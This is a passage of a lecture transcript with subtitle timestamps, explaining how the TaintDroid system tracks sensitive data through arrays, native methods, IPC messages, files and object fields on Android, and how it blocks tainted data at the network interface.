00:20:31,040 --> 00:20:32,500 from implementing these taint bits. 439 00:20:32,500 --> 00:20:35,160 If you had to express a larger universe of taints then 440 00:20:35,160 --> 00:20:37,076 you might be in trouble, because you might not 441 00:20:37,076 --> 00:20:39,070 be able to use these very efficient bitwise 442 00:20:39,070 --> 00:20:41,440 operations to do things. 443 00:20:41,440 --> 00:20:44,051 Any other questions about that? 444 00:20:44,051 --> 00:20:44,550 OK. 445 00:20:47,270 --> 00:20:50,212 So the way that arrays work is a little bit like that binary op 446 00:20:50,212 --> 00:20:50,920 like I mentioned. 447 00:20:50,920 --> 00:20:53,010 So this is going to get the union 448 00:20:53,010 --> 00:20:56,290 of the taint of this and that. 449 00:20:56,290 --> 00:20:59,950 And so one design decision that they made in TaintDroid 450 00:20:59,950 --> 00:21:07,741 is that they associate a single taint tab with each array. 451 00:21:07,741 --> 00:21:09,240 So in other words, they're not going 452 00:21:09,240 --> 00:21:13,492 to try to taint all the individual elements in there. 453 00:21:13,492 --> 00:21:14,950 So basically what's going to end up 454 00:21:14,950 --> 00:21:19,660 happening is that this is going to save them storage space, 455 00:21:19,660 --> 00:21:21,452 right, because for each array they declare, 456 00:21:21,452 --> 00:21:23,118 they'll just have a single through route 457 00:21:23,118 --> 00:21:25,250 to the entity that sort of floats around that array 458 00:21:25,250 --> 00:21:28,550 and represents all the taint that belongs to that array. 459 00:21:32,270 --> 00:21:34,170 There is one question about why is 460 00:21:34,170 --> 00:21:40,010 it safe to not have a finer grain system for taint. 461 00:21:40,010 --> 00:21:43,110 Because it seems like an array is a collection of data, 462 00:21:43,110 --> 00:21:45,680 so why shouldn't we have a bunch of labels flying around 463 00:21:45,680 --> 00:21:48,010 for each thing that's in that array? 464 00:21:48,010 --> 00:21:51,190 And so the answer to that is that by only 465 00:21:51,190 --> 00:21:53,380 associating one taint tag with the array 466 00:21:53,380 --> 00:21:56,910 and making it the union of all the things that's inside, 467 00:21:56,910 --> 00:22:00,500 that actually is going to overestimate taint. 468 00:22:00,500 --> 00:22:02,590 So in other words, if you have an array that 469 00:22:02,590 --> 00:22:04,580 has two items in it, and that array 470 00:22:04,580 --> 00:22:06,640 is tainted with the union of all of those things, 471 00:22:06,640 --> 00:22:09,930 well, that's probably a little bit-- it's conservative. 472 00:22:09,930 --> 00:22:12,270 Because it may be that if something only accesses this, 473 00:22:12,270 --> 00:22:14,186 maybe it didn't learn anything about the taint 474 00:22:14,186 --> 00:22:15,070 that was over here. 475 00:22:15,070 --> 00:22:17,720 But by being conservative, hopefully we 476 00:22:17,720 --> 00:22:19,607 will always be correct. 477 00:22:19,607 --> 00:22:21,065 In other words, if we underestimate 478 00:22:21,065 --> 00:22:22,620 the amount of taint that something had, 479 00:22:22,620 --> 00:22:24,540 then we might accidentally disclose something 480 00:22:24,540 --> 00:22:26,248 that we didn't want to actually disclose. 481 00:22:26,248 --> 00:22:28,570 But if we overestimate, then in the worst case, 482 00:22:28,570 --> 00:22:31,700 maybe we prevent something from going outside of the phone that 483 00:22:31,700 --> 00:22:33,380 should actually OK, but we're going 484 00:22:33,380 --> 00:22:35,027 to be err on the side of safety. 485 00:22:35,027 --> 00:22:36,110 Does that all makes sense? 486 00:22:38,790 --> 00:22:43,910 Another instance of-- a sort of special case taint 487 00:22:43,910 --> 00:22:49,825 propagation that they mention are things like native methods. 488 00:22:54,120 --> 00:22:57,570 And so native methods might exist inside of the v 489 00:22:57,570 --> 00:23:02,360 in itself, so for example, the Dalvik VM exposes some function 490 00:23:02,360 --> 00:23:08,120 like a System.arraycopy(), so we can pass in anything through 491 00:23:08,120 --> 00:23:13,270 this, and internal to the VM, this is implemented in C or C++ 492 00:23:13,270 --> 00:23:15,750 code for reasons of speed. 493 00:23:15,750 --> 00:23:18,510 That's one type of example of a native method you might have. 494 00:23:18,510 --> 00:23:22,950 Another thing you might have, a type of native method 495 00:23:22,950 --> 00:23:28,800 is what they call JNI expose methods. 496 00:23:28,800 --> 00:23:31,310 So the native interface essentially 497 00:23:31,310 --> 00:23:35,330 allows Java code to call into code 498 00:23:35,330 --> 00:23:38,492 that is not Java, that's implemented using x86 or ARM 499 00:23:38,492 --> 00:23:39,450 or something like that. 500 00:23:39,450 --> 00:23:41,350 There's a whole calling convention 501 00:23:41,350 --> 00:23:43,600 that's exposed here to allow those two types of stacks 502 00:23:43,600 --> 00:23:45,330 to interoperate. 503 00:23:45,330 --> 00:23:49,460 And so the problem with these native code methods, 504 00:23:49,460 --> 00:23:52,370 from the perspective of tracking taint, 505 00:23:52,370 --> 00:23:57,440 is that this native code is not being executed directly 506 00:23:57,440 --> 00:23:59,540 by the Dalvik interpreter. 507 00:23:59,540 --> 00:24:03,400 In fact, it is often not even Java code, maybe C or C++ code. 508 00:24:03,400 --> 00:24:06,300 So that means that once execution flow goes 509 00:24:06,300 --> 00:24:09,020 into one of these native methods, 510 00:24:09,020 --> 00:24:12,690 TaintDroid can't do any of this taint propagation 511 00:24:12,690 --> 00:24:17,010 that it's doing for code that lives in the Java world. 512 00:24:17,010 --> 00:24:18,930 So that seems a little bit problematic 513 00:24:18,930 --> 00:24:21,630 because these things are kind of like black boxes. 514 00:24:21,630 --> 00:24:25,360 You want to make sure that when these methods return, 515 00:24:25,360 --> 00:24:28,640 we can actually somehow represent 516 00:24:28,640 --> 00:24:30,720 the new taint that was created by the execution 517 00:24:30,720 --> 00:24:31,690 of those methods. 518 00:24:31,690 --> 00:24:38,490 And so the way that the authors solve this issue is, 519 00:24:38,490 --> 00:24:42,980 they essentially result to manual analysis. 520 00:24:46,160 --> 00:24:49,890 So they basically say, there are not a whole lot 521 00:24:49,890 --> 00:24:51,890 of these types of methods here. 522 00:24:51,890 --> 00:24:55,430 So for example, the Dalvik VM only exposes a certain number 523 00:24:55,430 --> 00:24:57,290 of functions like Systems.arraycopy(), 524 00:24:57,290 --> 00:25:00,080 so we as human developers can look through this relatively 525 00:25:00,080 --> 00:25:03,860 small number of calls and essentially figure out what 526 00:25:03,860 --> 00:25:05,560 the taint relationship should be. 527 00:25:05,560 --> 00:25:08,424 So for example, they can look at something like array copy 528 00:25:08,424 --> 00:25:09,840 and say, OK, based on what we know 529 00:25:09,840 --> 00:25:11,840 the semantics of this operation are, 530 00:25:11,840 --> 00:25:13,950 we know that we should taint the return values 531 00:25:13,950 --> 00:25:15,960 from this function in a certain way 532 00:25:15,960 --> 00:25:19,660 given the input values to this function. 533 00:25:19,660 --> 00:25:22,700 And so how well does this scale? 534 00:25:22,700 --> 00:25:25,690 Well, if there are in fact only a small number 535 00:25:25,690 --> 00:25:30,300 of things exposed by, for example, the VM in native code, 536 00:25:30,300 --> 00:25:31,960 this actually works OK. 537 00:25:31,960 --> 00:25:34,410 Because if you assume that the Dalvik VM interface doesn't 538 00:25:34,410 --> 00:25:36,640 change very often, then it's actually not 539 00:25:36,640 --> 00:25:39,300 too burdensome to look at these things, view the documentation, 540 00:25:39,300 --> 00:25:43,350 and figure out how taint's going to spread. 541 00:25:43,350 --> 00:25:46,541 This may or may not be more troublesome. 542 00:25:46,541 --> 00:25:48,790 They give some empirical data that suggests that a lot 543 00:25:48,790 --> 00:25:51,100 of applications are not, in fact, 544 00:25:51,100 --> 00:25:56,075 including code alongside of them that's actually going 545 00:25:56,075 --> 00:25:58,307 to execute in C or C++. 546 00:25:58,307 --> 00:26:00,140 So they argued that empirically, this is not 547 00:26:00,140 --> 00:26:01,223 going to be a big problem. 548 00:26:01,223 --> 00:26:05,840 They also argue that for certain types of method signatures, 549 00:26:05,840 --> 00:26:09,900 you can actually automate the way in which these taint 550 00:26:09,900 --> 00:26:11,160 calculations are done. 551 00:26:11,160 --> 00:26:14,210 So they say that, for example, if only integers or strings are 552 00:26:14,210 --> 00:26:17,000 pass in to some of these native functions here, then 553 00:26:17,000 --> 00:26:20,150 we can just do the standard thing of tagging the output 554 00:26:20,150 --> 00:26:23,389 value with the union of all things the taints of the input. 555 00:26:23,389 --> 00:26:25,430 So in practice, it seems like this isn't probably 556 00:26:25,430 --> 00:26:27,315 going to be too big of a problem here. 557 00:26:27,315 --> 00:26:30,780 AUDIENCE: But why couldn't you just scan-- whatever 558 00:26:30,780 --> 00:26:33,750 scans your code [INAUDIBLE]? 559 00:26:36,720 --> 00:26:39,610 PROFESSOR: Oh yeah, so in practice, what do they do. 560 00:26:39,610 --> 00:26:43,610 So they know that whenever the interpreter is going to execute 561 00:26:43,610 --> 00:26:46,410 something like this, then when the return value comes back, 562 00:26:46,410 --> 00:26:49,130 they do have special case code that's going to automagically 563 00:26:49,130 --> 00:26:52,750 say return values of System.arraycopy() should have 564 00:26:52,750 --> 00:26:54,149 this taint assigned to it. 565 00:26:54,149 --> 00:26:56,190 AUDIENCE: Right, so what's the manual part of it? 566 00:26:56,190 --> 00:26:57,545 PROFESSOR: Oh, the manual part of it 567 00:26:57,545 --> 00:27:00,260 is figuring out what that policy should be in the first place. 568 00:27:00,260 --> 00:27:03,450 So in other words, if you just look at off the shelf 569 00:27:03,450 --> 00:27:05,255 Taint or off the shelf Android, this 570 00:27:05,255 --> 00:27:06,630 is going to do something for you, 571 00:27:06,630 --> 00:27:08,380 but it's not going to automatically assign 572 00:27:08,380 --> 00:27:09,630 Taint in the right way. 573 00:27:09,630 --> 00:27:11,130 So someone looks at this and figures 574 00:27:11,130 --> 00:27:12,990 out what that policy is. 575 00:27:12,990 --> 00:27:13,490 Make sense? 576 00:27:13,490 --> 00:27:15,584 Any other questions? 577 00:27:15,584 --> 00:27:17,000 It doesn't look like this is going 578 00:27:17,000 --> 00:27:23,210 to be a big problem in practice, although you can imagine that, 579 00:27:23,210 --> 00:27:26,120 for example, if there was this increasing 580 00:27:26,120 --> 00:27:29,280 amount of applications that define these native outcalls, 581 00:27:29,280 --> 00:27:32,841 then we could be in a little bit of a problem. 582 00:27:32,841 --> 00:27:33,340 All right. 583 00:27:38,790 --> 00:27:42,780 So another type of data that we have 584 00:27:42,780 --> 00:27:49,290 to worry about assigning taint to, IPC messages. 585 00:27:49,290 --> 00:27:53,257 And so IPC messages are essentially 586 00:27:53,257 --> 00:27:54,090 treated like arrays. 587 00:27:56,610 --> 00:28:01,790 So each one of these messages is going 588 00:28:01,790 --> 00:28:04,310 to be associated with a single taint that 589 00:28:04,310 --> 00:28:08,230 is the union of the taint of all the constituent parts. 590 00:28:08,230 --> 00:28:09,900 Once again, this helps with efficiency 591 00:28:09,900 --> 00:28:13,140 because we only have to store one taint tag 592 00:28:13,140 --> 00:28:15,360 for each one of these messages. 593 00:28:15,360 --> 00:28:17,860 And in the worst case, this is conservative, 594 00:28:17,860 --> 00:28:19,170 it overestimates taint. 595 00:28:19,170 --> 00:28:21,727 But that should never result in a security leak. 596 00:28:21,727 --> 00:28:23,560 At worst, it should only result in something 597 00:28:23,560 --> 00:28:25,650 that should have been able to go over the network not being 598 00:28:25,650 --> 00:28:27,030 able to go on the network. 599 00:28:30,110 --> 00:28:32,730 This is how things work when you're constructing 600 00:28:32,730 --> 00:28:34,800 the message, so that message gets 601 00:28:34,800 --> 00:28:36,880 the union of all the taint of its components. 602 00:28:36,880 --> 00:28:40,570 Then when you're reading it, what you 603 00:28:40,570 --> 00:28:46,500 receive in the message-- so extracted data 604 00:28:46,500 --> 00:28:52,560 gets the taint of the message itself, which makes sense. 605 00:28:55,240 --> 00:28:57,200 So that's how IPC messages are treated. 606 00:28:57,200 --> 00:29:03,000 Another resource you might worry about is how a file's handled. 607 00:29:03,000 --> 00:29:10,160 So once again each file gets a single taint tag, 608 00:29:10,160 --> 00:29:11,770 and that tag is essentially stored 609 00:29:11,770 --> 00:29:14,970 alongside the file in its metadata on stable stores 610 00:29:14,970 --> 00:29:17,219 like the SD card or whatever. 611 00:29:17,219 --> 00:29:19,260 So this is basically the same conservative scheme 612 00:29:19,260 --> 00:29:20,360 that we've seen before. 613 00:29:20,360 --> 00:29:25,030 So the basic idea is that the application accesses 614 00:29:25,030 --> 00:29:27,090 some sensitive data like, for example, your GPS 615 00:29:27,090 --> 00:29:31,710 location, maybe it's going to write that data to a file. 616 00:29:31,710 --> 00:29:34,730 So TaintDroid updates that file's taint tag 617 00:29:34,730 --> 00:29:38,700 with the GPS flag, maybe the application closes down, 618 00:29:38,700 --> 00:29:42,940 later on some other application comes out, it reads that file. 619 00:29:42,940 --> 00:29:46,700 When it comes into the VM, into the application, 620 00:29:46,700 --> 00:29:48,200 TaintDroid will look and see that it 621 00:29:48,200 --> 00:29:52,150 has that flag marked, and so any data that's 622 00:29:52,150 --> 00:29:55,550 derived from reading that file will also have that GPS flag 623 00:29:55,550 --> 00:29:56,240 set. 624 00:29:56,240 --> 00:29:59,590 So pretty straightforward, I think. 625 00:29:59,590 --> 00:30:04,410 So what kind of things do we have 626 00:30:04,410 --> 00:30:07,170 to taint in terms of Java State. 627 00:30:07,170 --> 00:30:15,990 So there's basically five types of Java objects 628 00:30:15,990 --> 00:30:19,570 that need taint flags. 629 00:30:23,190 --> 00:30:31,330 And so the first kind of thing is local variables 630 00:30:31,330 --> 00:30:34,370 that live in a method. 631 00:30:34,370 --> 00:30:37,430 So we can imagine back over here, 632 00:30:37,430 --> 00:30:40,110 this is a local variable, char c, for example. 633 00:30:40,110 --> 00:30:44,560 So we have to assign taint flags to those things. 634 00:30:44,560 --> 00:30:50,560 You can also imagine that method arguments 635 00:30:50,560 --> 00:30:52,440 need to have taint flags. 636 00:30:52,440 --> 00:30:59,030 Both of these things here, these live in a stack. 637 00:31:03,280 --> 00:31:06,090 So a TaintDroid has to keep track of assigning flags 638 00:31:06,090 --> 00:31:08,070 and whatnot for those types of things. 639 00:31:08,070 --> 00:31:15,460 Also we need to assign flags to object instance fields. 640 00:31:19,980 --> 00:31:24,670 And so this is like, imagine that I have some object called 641 00:31:24,670 --> 00:31:28,166 c, it's a circle so of course the proper thing to do 642 00:31:28,166 --> 00:31:29,730 is I want to look at its radius. 643 00:31:29,730 --> 00:31:31,520 Here's a field here. 644 00:31:31,520 --> 00:31:36,690 And so we have to associate taint information for each one 645 00:31:36,690 --> 00:31:39,030 of these fields here. 646 00:31:39,030 --> 00:31:46,660 Java also allows you to have a static class field, 647 00:31:46,660 --> 00:31:50,300 and so you need taint information for those. 648 00:31:50,300 --> 00:31:56,030 This is saying something like, for example, maybe the circle 649 00:31:56,030 --> 00:31:59,200 that some property, OK, we'll assign some taint 650 00:31:59,200 --> 00:32:00,530 information there. 651 00:32:00,530 --> 00:32:04,080 Then arrays, as we've already discussed before, 652 00:32:04,080 --> 00:32:07,750 we'll assign one piece of taint information 653 00:32:07,750 --> 00:32:09,350 per that entire array. 654 00:32:09,350 --> 00:32:12,030 And so the basic idea for how we're 655 00:32:12,030 --> 00:32:15,450 going to store these taint flags at the implementation level, 656 00:32:15,450 --> 00:32:21,887 is that we're going to try to basically store the taint 657 00:32:21,887 --> 00:32:27,560 flags for a variable near the variable itself. 658 00:32:33,620 --> 00:32:38,170 The basic idea here is we've got, for example, 659 00:32:38,170 --> 00:32:40,070 let's say some integer variable, and we 660 00:32:40,070 --> 00:32:42,740 want to store some taint state with that. 661 00:32:42,740 --> 00:32:45,430 We want to try to keep that state as close to the variable 662 00:32:45,430 --> 00:32:47,660 as possible for reasons of making the cache 663 00:32:47,660 --> 00:32:50,420 work efficiently at the processor level. 664 00:32:50,420 --> 00:32:52,790 So if we were to store taint very far 665 00:32:52,790 --> 00:32:54,376 away from that variable, that can 666 00:32:54,376 --> 00:32:56,640 be problematic because probably, the interpreter 667 00:32:56,640 --> 00:32:59,250 is going to look at the memory value for the actual Java 668 00:32:59,250 --> 00:32:59,860 variable. 669 00:32:59,860 --> 00:33:02,310 It's going to want to very quickly thereafter, or even 670 00:33:02,310 --> 00:33:04,990 before that, look and see what the taint information is. 671 00:33:04,990 --> 00:33:09,566 Because if you look at these operations here, 672 00:33:09,566 --> 00:33:10,940 the same places in the code where 673 00:33:10,940 --> 00:33:12,280 the interpreter's looking at the values, 674 00:33:12,280 --> 00:33:13,710 it's also looking at taint. 675 00:33:13,710 --> 00:33:17,710 Basically by storing these things close to each other, 676 00:33:17,710 --> 00:33:19,880 you try to make the cache behavior better. 677 00:33:19,880 --> 00:33:22,840 And the way that they do this is actually 678 00:33:22,840 --> 00:33:25,520 pretty straightforward. 679 00:33:25,520 --> 00:33:30,660 So if you look at what they do for method arguments 680 00:33:30,660 --> 00:33:32,500 and local variables that live on a stack, 681 00:33:32,500 --> 00:33:36,390 they essentially allocate the taint flags 682 00:33:36,390 --> 00:33:39,330 right next to where the variables are allocated. 683 00:33:39,330 --> 00:33:44,860 So let's say that we have our favorite thing in this class, 684 00:33:44,860 --> 00:33:47,360 a stack diagram, which you'll probably 685 00:33:47,360 --> 00:33:49,110 hate after you get out of here. 686 00:33:49,110 --> 00:33:56,740 So you've got some local variable 0 on the stack, 687 00:33:56,740 --> 00:33:59,220 and then what TaintDroid will do is 688 00:33:59,220 --> 00:34:02,270 it will store the taint tag for that variable 689 00:34:02,270 --> 00:34:05,540 right next to where that local variable is in memory. 690 00:34:05,540 --> 00:34:10,810 So similarly, if you had another local variable here, 691 00:34:10,810 --> 00:34:16,900 then you would see its taint tag right down here. 692 00:34:16,900 --> 00:34:19,362 So on and so forth. 693 00:34:19,362 --> 00:34:20,320 Pretty straightforward. 694 00:34:20,320 --> 00:34:22,567 So hopefully you get these things 695 00:34:22,567 --> 00:34:25,150 in the same cache line, that's going to make the accesses very 696 00:34:25,150 --> 00:34:25,671 cheap. 697 00:34:25,671 --> 00:34:26,170 Yeah? 698 00:34:26,170 --> 00:34:28,094 AUDIENCE: I was just wondering, how can you 699 00:34:28,094 --> 00:34:30,350 have a single flag for an entire array 700 00:34:30,350 --> 00:34:33,810 and a different flag for every property of an object. 701 00:34:33,810 --> 00:34:38,080 What if one of the methods of the object 702 00:34:38,080 --> 00:34:41,023 can access data which is stored in its properties. 703 00:34:41,023 --> 00:34:42,895 That would like-- know what I mean? 704 00:34:42,895 --> 00:34:44,190 PROFESSOR: Let's see. 705 00:34:44,190 --> 00:34:47,030 So you're asking as a policy reason, why? 706 00:34:47,030 --> 00:34:48,530 AUDIENCE: As a policy reason, right. 707 00:34:48,530 --> 00:34:51,840 PROFESSOR: So I think some of this they do for implementation 708 00:34:51,840 --> 00:34:53,489 efficiency reasons. 709 00:34:53,489 --> 00:34:56,530 I think that for the case-- so they have some other rules, 710 00:34:56,530 --> 00:34:57,030 too. 711 00:34:57,030 --> 00:35:00,232 For example, they say that they don't say a length of the data 712 00:35:00,232 --> 00:35:02,750 array, is actually going to leak information, 713 00:35:02,750 --> 00:35:04,700 so they don't propagate taint for that. 714 00:35:04,700 --> 00:35:07,000 So some of it is just for reasons of efficiency. 715 00:35:07,000 --> 00:35:09,820 I think that in principle, that there's nothing that stops you 716 00:35:09,820 --> 00:35:14,450 from saying, take every element in the array 717 00:35:14,450 --> 00:35:16,636 and, when you do some particular access on it, 718 00:35:16,636 --> 00:35:18,760 then you just say the thing on the left hand side's 719 00:35:18,760 --> 00:35:21,741 going to get the taint, only that items. 720 00:35:21,741 --> 00:35:23,740 It's not completely clear that's the right thing 721 00:35:23,740 --> 00:35:25,910 to do, though, because presumably 722 00:35:25,910 --> 00:35:28,980 in getting that thing into the array in the first place, 723 00:35:28,980 --> 00:35:30,930 the thing that did that had to know something 724 00:35:30,930 --> 00:35:32,851 about the array in some way. 725 00:35:32,851 --> 00:35:35,100 So I think it's a combination of both policy reasons-- 726 00:35:35,100 --> 00:35:38,060 they think that by being overly conservative, 727 00:35:38,060 --> 00:35:42,200 you shouldn't allow any data leaks that you want to prevent. 728 00:35:42,200 --> 00:35:44,740 And also I think that it kind of does intuitively 729 00:35:44,740 --> 00:35:47,035 make sense that accessing an array, 730 00:35:47,035 --> 00:35:49,160 you should have to know something about that array. 731 00:35:49,160 --> 00:35:50,740 And when you have to know something about something, 732 00:35:50,740 --> 00:35:52,948 that typically means that you want to get tainted by. 733 00:35:54,810 --> 00:35:57,210 Any other questions? 734 00:35:57,210 --> 00:35:59,425 OK, so this is the basic scheme that they 735 00:35:59,425 --> 00:36:02,830 use for essentially storing all of this information close 736 00:36:02,830 --> 00:36:03,500 to each other. 737 00:36:03,500 --> 00:36:05,300 So you can imagine that for class fields 738 00:36:05,300 --> 00:36:07,440 and for object fields, you do a similar thing. 739 00:36:07,440 --> 00:36:09,280 So in the declaration of the class, 740 00:36:09,280 --> 00:36:12,580 you've got some slot memory for a particular instance variable, 741 00:36:12,580 --> 00:36:14,530 and then right next to that slot you 742 00:36:14,530 --> 00:36:18,660 have the taint information for that particular variable. 743 00:36:18,660 --> 00:36:21,380 So I think that's all pretty reasonable. 744 00:36:22,860 --> 00:36:26,780 That's kind of a high level overview of how TaintDroid 745 00:36:26,780 --> 00:36:30,990 works, so if you get all this, then the basic idea 746 00:36:30,990 --> 00:36:33,900 behind TaintDroid is actually pretty simple. 747 00:36:33,900 --> 00:36:37,900 So at system initialization time or whatever, 748 00:36:37,900 --> 00:36:41,660 TaintDroid looks at all these sources of potentially tainted 749 00:36:41,660 --> 00:36:43,880 information, and essentially assigns a flag 750 00:36:43,880 --> 00:36:45,046 to each one of these things. 751 00:36:45,046 --> 00:36:47,940 So things like your GPS, your camera, and so on and so forth. 752 00:36:47,940 --> 00:36:50,243 As the program executes, it's going 753 00:36:50,243 --> 00:36:51,670 to pull out sensitive information 754 00:36:51,670 --> 00:36:54,720 from these sensitive sources, and then as that kind of thing 755 00:36:54,720 --> 00:36:56,460 happens, the interpreter is going 756 00:36:56,460 --> 00:36:58,043 to look at all these types of op codes 757 00:36:58,043 --> 00:37:01,640 here and basically follow those policy 758 00:37:01,640 --> 00:37:03,653 rules in the table on the paper, and figure out 759 00:37:03,653 --> 00:37:06,780 how to propagate taint through the system. 760 00:37:06,780 --> 00:37:08,990 So the most interesting part is what 761 00:37:08,990 --> 00:37:12,570 happens if data attempts to exfiltrate itself. 762 00:37:12,570 --> 00:37:15,660 So essentially, TaintDroid can sit at the network interfaces 763 00:37:15,660 --> 00:37:18,320 and they can see everything that tries to go over the network 764 00:37:18,320 --> 00:37:18,944 interface. 765 00:37:18,944 --> 00:37:20,610 We actually look at the taint tags there 766 00:37:20,610 --> 00:37:24,520 and we can say if data that's trying to leave the network 767 00:37:24,520 --> 00:37:29,070 has one or more taint flags, then we will say no. 768 00:37:29,070 --> 00:37:32,060 That data will not be allowed to go in the network. 769 00:37:32,060 --> 00:37:35,175 Now what happens at that point is actually 770 00:37:35,175 --> 00:37:37,090 kind of application-dependent. 771 00:37:37,090 --> 00:37:39,730 You could imagine that TaintDroid shows an alert 772 00:37:39,730 --> 00:37:41,690 to the user which says hey, somebody's 773 00:37:41,690 --> 00:37:44,859 trying to send your location over the network. 774 00:37:44,859 --> 00:37:46,650 You could imagine that maybe TaintDroid has 775 00:37:46,650 --> 00:37:49,380 some policies that are built in which, for example, 776 00:37:49,380 --> 00:37:51,390 maybe it allows that network flow to go out, 777 00:37:51,390 --> 00:37:53,610 but it zeros out all that sensitive data, 778 00:37:53,610 --> 00:37:54,620 so on and so forth. 779 00:37:54,620 --> 00:37:56,895 That's from a certain perspective, a little bit 780 00:37:56,895 --> 00:37:57,850 orthogonal to the core contribution 781 00:37:57,850 --> 00:38:00,250 of the paper, which is to find those data exfiltrations 782 00:38:00,250 --> 00:38:03,335 in the first place. 783 00:38:03,335 --> 00:38:04,960 In the evaluation section of the paper, 784 00:38:04,960 --> 00:38:07,240 they discuss some of the things that they found. 785 00:38:07,240 --> 00:38:10,740 They do find that Android applications will 786 00:38:10,740 --> 00:38:13,410 try to exfiltrate data in ways that 787 00:38:13,410 --> 00:38:15,104 were not exposed to the user. 788 00:38:15,104 --> 00:38:17,187 So for example, they will try to use your location 789 00:38:17,187 --> 00:38:20,090 for advertisements, they will send your phone number 790 00:38:20,090 --> 00:38:22,080 and things like this to remote servers. 791 00:38:22,080 --> 00:38:26,170 Once again, it's important to note that these applications, 792 00:38:26,170 --> 00:38:31,200 typically they weren't breaking the Android security 793 00:38:31,200 --> 00:38:33,870 model in the sense that the user had 794 00:38:33,870 --> 00:38:36,350 allowed these applications with access to the network, 795 00:38:36,350 --> 00:38:37,087 for example. 796 00:38:37,087 --> 00:38:38,670 Or they had allowed these applications 797 00:38:38,670 --> 00:38:40,760 to have access to things like a contact list. 798 00:38:40,760 --> 00:38:43,140 However, the applications did not 799 00:38:43,140 --> 00:38:46,027 exposed to the user in the EULA, in the End User License 800 00:38:46,027 --> 00:38:48,360 Agreement, that hey, I'm going to take your phone number 801 00:38:48,360 --> 00:38:52,550 and actually send it to some server in Silk Road 8 802 00:38:52,550 --> 00:38:54,280 or whatever. 803 00:38:54,280 --> 00:38:57,134 That's actually misleading and deceptive, because most users, 804 00:38:57,134 --> 00:38:58,800 if they'd actually seen that in the EULA 805 00:38:58,800 --> 00:39:00,299 and they'd known that was happening, 806 00:39:00,299 --> 00:39:02,827 they might have at least had a second thought about 807 00:39:02,827 --> 00:39:05,035 whether they want to install this application or not. 808 00:39:05,035 --> 00:39:08,915 AUDIENCE: Is it reasonable to guess that even if they put it 809 00:39:08,915 --> 00:39:10,855 in the EULA, that that's not really worth 810 00:39:10,855 --> 00:39:12,313 it because people never read those. 811 00:39:12,313 --> 00:39:14,080 PROFESSOR: Yes, it is, in fact, quite 812 00:39:14,080 --> 00:39:15,770 reasonable to assume that. 813 00:39:15,770 --> 00:39:17,945 So even well trained computer scientists like myself 814 00:39:17,945 --> 00:39:19,820 do not always check out the EULA because it's 815 00:39:19,820 --> 00:39:21,670 like, you gotta have Flappy Birds 816 00:39:21,670 --> 00:39:23,000 or what are you going to do. 817 00:39:23,000 --> 00:39:25,794 I think what is useful, though, and this 818 00:39:25,794 --> 00:39:27,710 is kind of spiritually unsatisfying but useful 819 00:39:27,710 --> 00:39:30,081 in practice, is that if it is put in the EULA, 820 00:39:30,081 --> 00:39:32,330 then maybe there will be some virtuous individuals who 821 00:39:32,330 --> 00:39:34,050 do actually read the EULA. 822 00:39:34,050 --> 00:39:34,600 AUDIENCE: And they could tell you like-- 823 00:39:34,600 --> 00:39:35,490 PROFESSOR: That's right, that's right. 824 00:39:35,490 --> 00:39:35,880 AUDIENCE: --don't do that one. 825 00:39:35,880 --> 00:39:37,960 PROFESSOR: Yeah, Consumer Reports 826 00:39:37,960 --> 00:39:41,380 or some moral equivalent will say our job is to read EULAs, 827 00:39:41,380 --> 00:39:43,526 and by the way, you shouldn't download this app. 828 00:39:43,526 --> 00:39:45,820 But you're exactly correct that relying on users 829 00:39:45,820 --> 00:39:48,345 to read pages of tiny print is basically-- 830 00:39:48,345 --> 00:39:49,470 they're not going to do it. 831 00:39:49,470 --> 00:39:54,260 They're going to hit Next and then keep on going. 832 00:39:54,260 --> 00:39:57,500 OK, so any questions up to this point? 833 00:39:57,500 --> 00:40:02,890 I think that the rules for how information 834 00:40:02,890 --> 00:40:05,650 flows through the system are fairly straightforward. 835 00:40:05,650 --> 00:40:07,560 So as we were discussing, it's basically 836 00:40:07,560 --> 00:40:10,400 taint from the right hand side goes to the left side. 837 00:40:10,400 --> 00:40:13,010 Sometimes, though, these information flow rules 838 00:40:13,010 --> 00:40:15,140 can have somewhat counterintuitive results. 839 00:40:15,140 --> 00:40:17,580 So imagine that an application is 840 00:40:17,580 --> 00:40:22,120 going to implement its own linked list class. 841 00:40:22,120 --> 00:40:28,550 So it's going to define some simple class up here called 842 00:40:28,550 --> 00:40:35,020 ListNode and it's going to have an object field for data. 843 00:40:35,020 --> 00:40:39,528 And then it will have a ListNode object 844 00:40:39,528 --> 00:40:46,310 which represents the next thing in the linked list. 845 00:40:46,310 --> 00:40:50,770 Suppose if the application assigned some tainted data 846 00:40:50,770 --> 00:40:54,590 to this field here. 847 00:40:54,590 --> 00:40:57,400 Some sensitive data derived from a GPS or whatever. 848 00:40:57,400 --> 00:40:59,810 So one question you might have is 849 00:40:59,810 --> 00:41:03,730 what happens when we calculate the length for this list. 850 00:41:03,730 --> 00:41:08,660 Should the length of the list be tainted? 851 00:41:08,660 --> 00:41:10,870 It may strike you as a bit counterintuitive 852 00:41:10,870 --> 00:41:13,920 that the answer is probability no, at least in the way 853 00:41:13,920 --> 00:41:15,670 that TaintDroid and a lot of these systems 854 00:41:15,670 --> 00:41:16,980 define information flow. 855 00:41:16,980 --> 00:41:25,530 So what does it mean to add a node to the linked list. 856 00:41:25,530 --> 00:41:28,460 It basically means three things. 857 00:41:28,460 --> 00:41:33,450 So the first thing you do is you allocate a new list 858 00:41:33,450 --> 00:41:37,680 node to contain this new data that you want to add. 859 00:41:37,680 --> 00:41:45,420 Then the second thing you do is you assign to the data 860 00:41:45,420 --> 00:41:48,050 field of this new node. 861 00:41:48,050 --> 00:41:50,130 And then the third thing that you do 862 00:41:50,130 --> 00:41:57,140 is you do some type of patch up of the next pointers 863 00:41:57,140 --> 00:42:02,380 to actually splice the node into the list. 864 00:42:02,380 --> 00:42:05,710 What's interesting is that this step here doesn't actually 865 00:42:05,710 --> 00:42:08,960 involve the data field at all. 866 00:42:08,960 --> 00:42:10,840 Just looking at these next values. 867 00:42:10,840 --> 00:42:14,820 Right, so what's interesting is that since only these data 868 00:42:14,820 --> 00:42:20,000 objects are tainted, how we calculate the length of a list. 869 00:42:20,000 --> 00:42:21,701 We basically start from some head node 870 00:42:21,701 --> 00:42:23,200 and we traverse these next pointers, 871 00:42:23,200 --> 00:42:25,050 and we count how many we traverse. 872 00:42:25,050 --> 00:42:27,383 So that algorithm is not going to touch the tainted data 873 00:42:27,383 --> 00:42:27,920 at all. 874 00:42:27,920 --> 00:42:31,990 So interestingly, even if you have a linked list that's 875 00:42:31,990 --> 00:42:36,190 filled with tainted data, then just 876 00:42:36,190 --> 00:42:38,410 